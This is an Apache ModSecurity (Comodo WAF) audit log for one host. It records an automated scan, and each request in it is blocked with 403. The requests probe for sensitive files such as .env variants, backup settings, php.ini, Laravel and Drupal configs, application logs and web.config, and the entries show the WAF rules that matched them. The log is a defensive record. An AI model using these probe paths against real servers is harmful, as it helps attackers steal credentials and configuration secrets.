l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aaf5eb6a-Z-- --0cd65e63-A-- [29/Apr/2025:03:49:50 +0700] aA_p7gW3ctMdWeqW3LOhLQAAAEE 103.236.140.4 47902 103.236.140.4 8181 --0cd65e63-B-- GET /env.backup HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0cd65e63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cd65e63-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873390450586 1777 (- - -) Stopwatch2: 1745873390450586 1777; combined=692, p1=357, p2=309, p3=0, p4=0, p5=26, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cd65e63-Z-- --cbab8828-A-- [29/Apr/2025:03:49:50 +0700] aA_p7gW3ctMdWeqW3LOhLwAAAEU 103.236.140.4 47908 103.236.140.4 8181 --cbab8828-B-- GET /settings.bak HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --cbab8828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbab8828-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873390647723 2533 (- - -) Stopwatch2: 1745873390647723 2533; combined=920, p1=481, p2=410, p3=0, p4=0, p5=29, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbab8828-Z-- --bd1b9473-A-- [29/Apr/2025:03:49:51 +0700] aA_p7wW3ctMdWeqW3LOhMQAAAEc 103.236.140.4 47912 103.236.140.4 8181 --bd1b9473-B-- GET /old/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --bd1b9473-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd1b9473-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873391050601 688 (- - -) Stopwatch2: 1745873391050601 688; combined=304, p1=272, p2=0, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd1b9473-Z-- --f0ad395d-A-- [29/Apr/2025:03:49:51 +0700] aA_p7wW3ctMdWeqW3LOhNgAAAFE 103.236.140.4 47924 103.236.140.4 8181 --f0ad395d-B-- GET /laravel/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f0ad395d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0ad395d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873391849184 751 (- - -) Stopwatch2: 1745873391849184 751; combined=327, p1=292, p2=0, p3=0, p4=0, p5=34, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0ad395d-Z-- --3c3dff24-A-- [29/Apr/2025:03:49:52 +0700] aA_p8AW3ctMdWeqW3LOhNwAAAFA 103.236.140.4 47926 103.236.140.4 8181 --3c3dff24-B-- GET /app/config/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3c3dff24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c3dff24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873392045505 683 (- - -) Stopwatch2: 1745873392045505 683; combined=280, p1=252, p2=0, p3=0, p4=0, p5=27, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c3dff24-Z-- --f764235b-A-- [29/Apr/2025:03:49:53 +0700] aA_p8QW3ctMdWeqW3LOhOQAAAFQ 103.236.140.4 47932 103.236.140.4 8181 --f764235b-B-- GET /.gitignore HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f764235b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f764235b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.gitignore" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873393233703 813 (- - -) Stopwatch2: 1745873393233703 813; combined=341, p1=293, p2=0, p3=0, p4=0, p5=48, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f764235b-Z-- --405fd031-A-- [29/Apr/2025:03:49:55 +0700] aA_p8wW3ctMdWeqW3LOhPwAAAEM 103.236.140.4 47948 103.236.140.4 8181 --405fd031-B-- GET /sites/default/settings.php HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --405fd031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --405fd031-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sites/default/settings.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873395299145 716 (- - -) Stopwatch2: 1745873395299145 716; combined=316, p1=285, p2=0, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --405fd031-Z-- --4568f921-A-- [29/Apr/2025:03:49:56 +0700] aA_p9AW3ctMdWeqW3LOhRQAAAE0 103.236.140.4 47962 103.236.140.4 8181 --4568f921-B-- GET /php.ini HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --4568f921-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4568f921-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873396314328 1837 (- - -) Stopwatch2: 1745873396314328 1837; combined=685, p1=356, p2=295, p3=0, p4=0, p5=34, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4568f921-Z-- --1338b36d-A-- [29/Apr/2025:03:49:58 +0700] aA_p9gW3ctMdWeqW3LOhUAAAAEc 103.236.140.4 47992 103.236.140.4 8181 --1338b36d-B-- GET /public/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --1338b36d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1338b36d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873398620697 661 (- - -) Stopwatch2: 1745873398620697 661; combined=271, p1=244, p2=0, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1338b36d-Z-- --487c3a50-A-- [29/Apr/2025:03:50:00 +0700] aA_p-AW3ctMdWeqW3LOhVAAAAEw 103.236.140.4 48004 103.236.140.4 8181 --487c3a50-B-- GET /composer.json HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --487c3a50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --487c3a50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/composer.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873400337503 832 (- - -) Stopwatch2: 1745873400337503 832; combined=367, p1=332, p2=0, p3=0, p4=0, p5=35, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --487c3a50-Z-- --d7ccbb56-A-- [29/Apr/2025:03:50:00 +0700] aA_p-AW3ctMdWeqW3LOhVQAAAE0 103.236.140.4 48006 103.236.140.4 8181 --d7ccbb56-B-- GET /api/v1/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d7ccbb56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7ccbb56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873400533705 670 (- - -) Stopwatch2: 1745873400533705 670; combined=274, p1=243, p2=0, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7ccbb56-Z-- --a9d64f50-A-- [29/Apr/2025:03:50:01 +0700] aA_p-QW3ctMdWeqW3LOhWQAAAFA 103.236.140.4 48018 103.236.140.4 8181 --a9d64f50-B-- GET /.env.example HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a9d64f50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9d64f50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873401327496 635 (- - -) Stopwatch2: 1745873401327496 635; combined=247, p1=220, p2=0, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9d64f50-Z-- --84ba7801-A-- [29/Apr/2025:03:50:01 +0700] aA_p-QW3ctMdWeqW3LOhWgAAAFI 103.236.140.4 48020 103.236.140.4 8181 --84ba7801-B-- GET /storage/logs/laravel.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --84ba7801-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84ba7801-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873401523911 1833 (- - -) Stopwatch2: 1745873401523911 1833; combined=766, p1=374, p2=365, p3=0, p4=0, p5=26, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84ba7801-Z-- --51171775-A-- [29/Apr/2025:03:50:03 +0700] aA_p-8DCAfZpkPvVAPOdIAAAAIM 103.236.140.4 48038 103.236.140.4 8181 --51171775-B-- GET /.env.local HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --51171775-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51171775-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873403786527 812 (- - -) Stopwatch2: 1745873403786527 812; combined=314, p1=275, p2=0, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51171775-Z-- --94b2c370-A-- [29/Apr/2025:03:50:03 +0700] aA_p-8DCAfZpkPvVAPOdIgAAAIA 103.236.140.4 48044 103.236.140.4 8181 --94b2c370-B-- GET /.env.dev HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --94b2c370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94b2c370-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873403982533 740 (- - -) Stopwatch2: 1745873403982533 740; combined=320, p1=286, p2=0, p3=0, p4=0, p5=33, sr=119, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94b2c370-Z-- --d7ccbb56-A-- [29/Apr/2025:03:50:04 +0700] aA_p_MDCAfZpkPvVAPOdIwAAAII 103.236.140.4 48046 103.236.140.4 8181 --d7ccbb56-B-- GET /.env.test HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d7ccbb56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7ccbb56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873404180942 752 (- - -) Stopwatch2: 1745873404180942 752; combined=309, p1=274, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7ccbb56-Z-- --be08ba13-A-- [29/Apr/2025:03:50:05 +0700] aA_p_QW3ctMdWeqW3LOhXQAAAFY 103.236.140.4 48052 103.236.140.4 8181 --be08ba13-B-- GET /var/logs/dev.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --be08ba13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be08ba13-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873405380761 2854 (- - -) Stopwatch2: 1745873405380761 2854; combined=973, p1=443, p2=499, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be08ba13-Z-- --62f57559-A-- [29/Apr/2025:03:50:05 +0700] aA_p_QW3ctMdWeqW3LOhXgAAAFU 103.236.140.4 48054 103.236.140.4 8181 --62f57559-B-- GET /var/logs/prod.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --62f57559-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62f57559-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873405580437 2251 (- - -) Stopwatch2: 1745873405580437 2251; combined=850, p1=434, p2=382, p3=0, p4=0, p5=34, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62f57559-Z-- --dfb65528-A-- [29/Apr/2025:03:50:06 +0700] aA_p_gW3ctMdWeqW3LOhYwAAAEM 103.236.140.4 48066 103.236.140.4 8181 --dfb65528-B-- GET /web.config HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --dfb65528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfb65528-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873406397316 673 (- - -) Stopwatch2: 1745873406397316 673; combined=266, p1=239, p2=0, p3=0, p4=0, p5=26, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
